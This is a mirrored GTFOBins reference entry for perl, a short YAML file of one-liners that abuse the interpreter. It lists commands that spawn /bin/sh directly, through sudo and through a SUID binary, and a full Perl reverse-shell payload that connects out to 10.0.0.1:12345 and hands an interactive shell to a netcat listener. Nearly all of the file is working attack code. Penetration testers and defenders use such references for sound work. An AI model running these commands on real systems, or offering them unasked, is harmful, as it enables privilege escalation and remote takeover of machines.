mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 14:59:44 +01:00
15 lines
594 B
Markdown
15 lines
594 B
Markdown
---
|
|
functions:
|
|
exec-interactive:
|
|
- code: perl -e 'exec "/bin/sh";'
|
|
sudo-enabled:
|
|
- code: sudo perl -e 'exec "/bin/sh";'
|
|
suid-enabled:
|
|
- code: ./perl -e 'exec "/bin/sh";'
|
|
reverse-shell:
|
|
- description: Run `nc -l -p 12345` to receive the shell on the other end.
|
|
code: |
|
|
export RHOST=10.0.0.1
|
|
export RPORT=12345
|
|
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
|
--- |